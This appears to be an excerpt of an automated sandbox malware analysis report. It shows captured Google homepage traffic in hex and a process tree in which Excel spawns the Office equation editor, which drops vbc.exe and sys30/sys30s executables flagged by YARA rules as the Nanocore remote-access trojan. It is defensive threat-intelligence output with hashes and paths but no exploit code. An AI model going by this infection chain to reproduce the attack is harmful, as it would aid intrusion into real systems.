                                  Data Ascii: Translate</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.co.uk/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.co.uk/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><
                                  2021-09-14 19:48:41 UTC138INData Raw: 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 53 65 72 76 69 63 65 4c 6f 67 69 6e 3f 68 6c 3d 65 6e 26 70 61 73 73 69 76 65 3d 74 72 75 65 26 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 65 63 3d 47 41 5a 41 41 51 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 62 61 72 2e 6c 6f 67 67 65 72 2e 69 6c 28 39 2c 7b 6c 3a 27 69 27 7d 29 22 20 69 64 3d 67 62 5f 37 30 20 63 6c 61 73 73 3d 67 62 67 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 67 62 67 73 34 20 63 6c 61 73 73 3d 67 62 74 73 3e 3c 73 70 61 6e 20 69 64 3d 67 62 69 34 73 31 3e 53 69 67 6e 20 69 6e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 74
                                  Data Ascii: .google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZAAQ" onclick="gbar.logger.il(9,{l:'i'})" id=gb_70 class=gbgt><span class=gbtb2></span><span id=gbgs4 class=gbts><span id=gbi4s1>Sign in</span></span></a></li><li class="gbt
                                  2021-09-14 19:48:41 UTC140INData Raw: 6e 64 5f 63 6f 6c 6f 72 5f 32 37 32 78 39 32 64 70 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 38 70 78 20 30 20 31 34 70 78 22 20 77 69 64 74 68 3d 22 32 37 32 22 20 69 64 3d 22 68 70 6c 6f 67 6f 22 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 64 69 76 3e 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 66 22 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 3c 74 72 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 3c 74 64 20 77 69 64 74 68 3d 22 32 35 25 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 6e 6f 77 72 61 70 3d 22 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 69 65 22 20 76 61 6c 75 65
                                  Data Ascii: nd_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%">&nbsp;</td><td align="center" nowrap=""><input name="ie" value
                                  2021-09-14 19:48:41 UTC141INData Raw: 73 73 3d 22 66 6c 20 73 62 6c 63 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 6e 6f 77 72 61 70 3d 22 22 20 77 69 64 74 68 3d 22 32 35 25 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 64 76 61 6e 63 65 64 5f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 61 75 74 68 75 73 65 72 3d 30 22 3e 41 64 76 61 6e 63 65 64 20 73 65 61 72 63 68 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 69 6e 70 75 74 20 69 64 3d 22 67 62 76 22 20 6e 61 6d 65 3d 22 67 62 76 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 31 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4b 39 4b 44 70 54 4c 7a 52 45 4e 72 6b 62 77 57 4e 32 59 4f 55 41 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 61 2c 62 3d 22 31 22 3b 69 66
                                  Data Ascii: ss="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en-GB&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="K9KDpTLzRENrkbwWN2YOUA==">(function(){var a,b="1";if
                                  2021-09-14 19:48:41 UTC142INData Raw: 79 2f 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 20 2d 20 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 70 3e 3c 2f 73 70 61 6e 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4b 39 4b 44 70 54 4c 7a 52 45 4e 72 6b 62 77 57 4e 32 59 4f 55 41 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 63 64 6f 3d 7b 68 65 69 67 68 74 3a 37 35 37 2c 77 69 64 74 68 3a 31 34 34 30 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 69 66 28 21 61 7c 7c 21 62 29 7b 76 61 72 20 63 3d 77 69 6e
                                  Data Ascii: y/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="K9KDpTLzRENrkbwWN2YOUA==">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=win
                                  2021-09-14 19:48:41 UTC144INData Raw: 79 7b 62 3d 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 67 6f 6f 67 23 68 74 6d 6c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 7d 29 7d 63 61 74 63 68 28 70 29 7b 65 2e 63 6f 6e 73 6f 6c 65 26 26 65 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 70 2e 6d 65 73 73 61 67 65 29 7d 67 3d 62 7d 65 6c 73 65 20 67 3d 62 7d 61 3d 28 62 3d 67 29 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 3b 61 3d 6e 65 77 20 6c 28 61 2c 68 29 3b 63 2e 73 72 63 3d 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 6c 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 6c 3f 61 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65
                                  Data Ascii: y{b=k.createPolicy("goog#html",{createHTML:f,createScript:f,createScriptURL:f})}catch(p){e.console&&e.console.error(p.message)}g=b}else g=b}a=(b=g)?b.createScriptURL(a):a;a=new l(a,h);c.src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResource
                                  2021-09-14 19:48:41 UTC145INData Raw: 32 32 2c 5c 78 32 32 6c 63 6b 79 5c 78 32 32 3a 5c 78 32 32 49 5c 5c 75 30 30 32 36 23 33 39 3b 6d 20 46 65 65 6c 69 6e 67 20 4c 75 63 6b 79 5c 78 32 32 2c 5c 78 32 32 6c 6d 6c 5c 78 32 32 3a 5c 78 32 32 4c 65 61 72 6e 20 6d 6f 72 65 5c 78 32 32 2c 5c 78 32 32 6f 73 6b 74 5c 78 32 32 3a 5c 78 32 32 49 6e 70 75 74 20 74 6f 6f 6c 73 5c 78 32 32 2c 5c 78 32 32 70 73 72 63 5c 78 32 32 3a 5c 78 32 32 54 68 69 73 20 73 65 61 72 63 68 20 77 61 73 20 72 65 6d 6f 76 65 64 20 66 72 6f 6d 20 79 6f 75 72 20 5c 5c 75 30 30 33 43 61 20 68 72 65 66 5c 78 33 64 5c 5c 5c 78 32 32 2f 68 69 73 74 6f 72 79 5c 5c 5c 78 32 32 5c 5c 75 30 30 33 45 57 65 62 20 48 69 73 74 6f 72 79 5c 5c 75 30 30 33 43 2f 61 5c 5c 75 30 30 33 45 5c 78 32 32 2c 5c 78 32 32 70 73 72 6c 5c 78 32 32
                                  Data Ascii: 22,\x22lcky\x22:\x22I\\u0026#39;m Feeling Lucky\x22,\x22lml\x22:\x22Learn more\x22,\x22oskt\x22:\x22Input tools\x22,\x22psrc\x22:\x22This search was removed from your \\u003Ca href\x3d\\\x22/history\\\x22\\u003EWeb History\\u003C/a\\u003E\x22,\x22psrl\x22
                                  2021-09-14 19:48:41 UTC146INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: EXCEL.EXE PID: 1936 Parent PID: 596

                                  General

                                  Start time:21:47:21
                                  Start date:14/09/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13f330000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: EQNEDT32.EXE PID: 2652 Parent PID: 596

                                  General

                                  Start time:21:47:43
                                  Start date:14/09/2021
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                  Imagebase:0x400000
                                  File size:543304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: vbc.exe PID: 2224 Parent PID: 2652

                                  General

                                  Start time:21:47:47
                                  Start date:14/09/2021
                                  Path:C:\Users\Public\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\Public\vbc.exe'
                                  Imagebase:0xd80000
                                  File size:667136 bytes
                                  MD5 hash:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: sys30.exe PID: 3048 Parent PID: 1764

                                  General

                                  Start time:21:48:03
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
                                  Imagebase:0x1220000
                                  File size:667136 bytes
                                  MD5 hash:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: sys30.exe PID: 2420 Parent PID: 2224

                                  General

                                  Start time:21:48:09
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
                                  Imagebase:0x1220000
                                  File size:667136 bytes
                                  MD5 hash:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: sys30.exe PID: 2652 Parent PID: 3048

                                  General

                                  Start time:21:48:16
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  Imagebase:0x1220000
                                  File size:667136 bytes
                                  MD5 hash:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, Author: Florian Roth
                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2256 Parent PID: 3048

                                  General

                                  Start time:21:48:23
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Antivirus matches:
                                  • Detection: 14%, Metadefender, Browse
                                  • Detection: 11%, ReversingLabs
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2620 Parent PID: 2256

                                  General

                                  Start time:21:48:24
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1816 Parent PID: 3048

                                  General

                                  Start time:21:48:29
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1948 Parent PID: 1816

                                  General

                                  Start time:21:48:31
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1012 Parent PID: 3048

                                  General

                                  Start time:21:48:34
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2828 Parent PID: 1012

                                  General

                                  Start time:21:48:36
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2520 Parent PID: 3048

                                  General

                                  Start time:21:48:40
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2548 Parent PID: 2520

                                  General

                                  Start time:21:48:41
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1996 Parent PID: 3048

                                  General

                                  Start time:21:48:46
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 408 Parent PID: 1996

                                  General

                                  Start time:21:48:48
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1856 Parent PID: 3048

                                  General

                                  Start time:21:48:52
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1228 Parent PID: 1856

                                  General

                                  Start time:21:48:54
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2700 Parent PID: 3048

                                  General

                                  Start time:21:48:58
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1864 Parent PID: 2700

                                  General

                                  Start time:21:49:02
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2668 Parent PID: 3048

                                  General

                                  Start time:21:49:06
